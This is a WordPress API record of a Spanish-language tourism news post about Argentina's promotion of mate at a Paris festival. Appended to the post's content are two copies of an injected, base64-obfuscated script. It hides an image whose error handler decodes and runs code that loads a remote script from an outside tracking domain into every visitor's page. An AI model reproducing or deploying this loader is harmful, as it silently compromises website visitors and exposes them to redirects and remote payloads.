{"id":3378,"date":"2023-12-01T10:04:41","date_gmt":"2023-12-01T13:04:41","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3378"},"modified":"2025-08-14T00:04:12","modified_gmt":"2025-08-14T03:04:12","slug":"el-mate-de-argentina-genera-atraccion-en-francia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3378","title":{"rendered":"EL MATE DE ARGENTINA GENERA ATRACCI\u00d3N EN FRANCIA"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-vivid-green-cyan-background-color has-background\"><em>Argentina, por medio del I<strong>nstituto Nacional de Promoci\u00f3n Tur\u00edstica (INPROTUR)<\/strong>, se hizo presente en el\u00a0<strong>2\u00b0 Festival del Mate<\/strong>, realizado en la\u00a0<strong>Embajada nacional en Par\u00eds, Francia<\/strong>, y con muy buena concurrencia por parte del p\u00fablico local.<\/em><\/h4>\n\n\n\n<p>El evento, organizado por la\u00a0<strong>Escuela Francesa del Mate<\/strong>, ofreci\u00f3 diferentes actividades en torno a esta popular infusi\u00f3n argentina. All\u00ed, representantes del INPROTUR, a trav\u00e9s de su marca\u00a0<em><strong>Visit Argentina<\/strong><\/em>, disertaron sobre la oferta tur\u00edstica del pa\u00eds y profundizaron acerca de todo lo que rodea al emblem\u00e1tico mate, que no es meramente una infusi\u00f3n, sino que valores como la amistad, la familia y el compartir son sus perfectos acompa\u00f1antes.<br>\u00a0<br>Cabe destacar tambi\u00e9n que, adem\u00e1s de la presentaci\u00f3n de INPROTUR, se llev\u00f3 adelante una master class de cocina y cocteler\u00eda con yerba mate, mesa redonda sobre las ventajas y consumo de mate, exposici\u00f3n de pinturas y fotograf\u00eda, entre otras acciones.\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci3.googleusercontent.com\/proxy\/mZfUsWEXoyM0AQ88V5Q_wYY5E76VtvqzBf8lZtNoo40wuSwtpAIvEJPi6yTebAZWg8Z3RuSbuh6n8iM6rnzo7MtB4XDnQYYJbh88NHVgNCXrpfAudi-v5KVaM0I-krMIauxSi9zHwJLD66VHYNlOKxsd51jx-Q=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/7964156d-7350-137d-a21d-8f18747f7a54.png\" alt=\"\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Argentina, por medio del Instituto Nacional de Promoci\u00f3n Tur\u00edstica (INPROTUR), se hizo presente en el\u00a02\u00b0 Festival del Mate, realizado en la\u00a0Embajada nacional en Par\u00eds, Francia, y con muy buena concurrencia por parte del p\u00fablico local. El evento, organizado por la\u00a0Escuela Francesa del Mate, ofreci\u00f3 diferentes actividades en torno a esta popular infusi\u00f3n argentina. All\u00ed, representantes [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3379,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3378","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3378"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3378"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3378\/revisions"}],"predecessor-version":[{"id":6903,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3378\/revisions\/6903"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3379"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3378"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3378"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3378"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}